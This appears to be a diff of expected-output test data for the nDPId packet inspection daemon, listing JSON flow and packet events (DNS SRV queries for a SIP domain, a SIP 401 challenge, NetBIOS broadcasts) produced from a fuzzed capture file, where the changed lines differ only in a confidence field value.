+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":433,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470474627,"flow_last_seen":1120470474627,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470474627,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":2,"flow_last_seen":1120470476630,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470476630,"pkt":"ADBUADRWAODtAW69CABFAABIa2QAAIARS+3AqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrJXMAAAE="} -00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00881{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470474627,"flow_last_seen":1120470476630,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":88,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470476630,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_packet_id":3,"flow_last_seen":1120470478633,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470478633,"pkt":"ADBUADRWAODtAW69CABFAABIa2UAAIARS+zAqAECwKgBAQrlADUANLH1d+oBAAABAAAAAAAABF9zaXAEX3VkcJpzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":437,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120470474627,"flow_last_seen":1120470478633,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470478633,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00920{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":438,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1120470474627,"flow_last_seen":1120470482638,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470482638,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2789,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_packet_id":1,"flow_last_seen":1120470490640,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470490640,"pkt":"ADBUADRWAODlAW69CABFAABEa2cAAIARS+7AqAECwKgBAQrmADUAMMHtYusAAAABAAAA6QAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} -00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00787{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":168,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490640,"flow_last_seen":1120470490640,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470490640,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2790,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":71,"global_ts_msec":1120470490642} 00425{"packet_event_id":1,"packet_event_name":"packet","packet_id":440,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":105,"pkt_l4_len":0,"thread_ts_msec":1120470490640,"pkt":"AJLtAW69ADBUADRWCABFAABbAABADUARtz7AqAEBwKgBAgA1CuYAR6QBYuuAAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01099{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_packet_id":1,"flow_last_seen":1120470490782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1120470490782,"pkt":"AODtAW69ADBUADRWCABFAAIBAABAADcRiizU8iEjwCVzABPEE8QB7RaaU0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA3OCBSRUdJU1RFUg0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9M2EyZDBkYw0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0NC5kaz47dGFnPTAwLTk0JXMALTE3MDFiNmFiLTEzOTM1YzgzNA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyYWNlaXZlZD04MC4yMzAuMjE5cjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5SEc0YktucDYxMDAxODczLTQzYmViWWE1MTkyLjE2OC4xLjINCldXVy1BdXRoZW50aWNhdGU6IERpZ2VzdCByZWFsbT0ic2lwLmN5YmVyY2l0eS5kayIsbm9mY2U9IjE3MDFiNjliNDdiNTFjNmQ2NmM5ZTQ1MDNjNjc5YzIiLG9wYXF1ZT0iMTcwMWExMzUxZjcwNzk1IixzdGFsZT1mYWxzZSxhbGdvcml0aG30TUQ1DQpDb250ZW50Lf5lbmd0aDogMA0KDQo="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":442,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":169,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470490782,"flow_last_seen":1120470490782,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1120470490782,"l3_proto":"ip4","src_ip":"212.242.33.35","dst_ip":"192.37.115.0","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_packet_id":1,"flow_last_seen":1120470491041,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470491041,"pkt":"ADBUADRWAODtAW69CABFAABIa2kAAIARS+jAqE8CwKgBAQrnADUANKZlgusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":443,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470491041,"flow_last_seen":1120470491041,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470491041,"l3_proto":"ip4","src_ip":"192.168.79.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_packet_id":1,"flow_last_seen":1120470492042,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIa2oAAIARS+fAqAE1wKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":444,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":171,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470492042,"flow_last_seen":1120470492042,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470492042,"l3_proto":"ip4","src_ip":"192.168.1.53","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00216{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":52,"global_ts_msec":1120470494045} 00399{"packet_event_id":1,"packet_event_name":"packet","packet_id":445,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470492042,"pkt":"ADBUADRWAODtAW69CABFAABIayVzAIARS+bAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_packet_id":1,"flow_last_seen":1120470494127,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470494127,"pkt":"\/\/\/\/\/\/\/\/AODtAW69CABFAABOa2wAAIARSuHAqAECwMIB\/wCJAIkAOltkhTcBEAABAAAAAAAAIEVGRURFSkZQRUVFUEVORUJFSkVPQ0FDQUNBQ0FDQUJNAAAgAAE="} -00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 
+00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":446,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470494127,"flow_last_seen":1120470494127,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470494127,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.194.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00602{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470495627,"flow_last_seen":1120470495627,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470495627,"l3_proto":"ip4","src_ip":"170.170.170.170","dst_ip":"170.170.170.170","src_port":43690,"dst_port":43690,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00524{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":173,"flow_packet_id":1,"flow_last_seen":1120470495627,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":92,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":92,"pkt_l4_len":58,"thread_ts_msec":1120470495627,"pkt":"\/\/\/\/\/\/\/\/AODtNm69CABFAABOe24AAIARSt+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_packet_id":1,"flow_last_seen":1120470496048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470496048,"pkt":"ADBUADRWAODtAVW9CABFAABIa28AAIARS+LAqAECwKgBAQrnADUANKbygusBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAghAAE="} -00793{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":449,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470496048,"flow_last_seen":1120470496048,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2791,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":2081,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":450,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470304312,"flow_last_seen":1120470304312,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120470496048,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"120.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 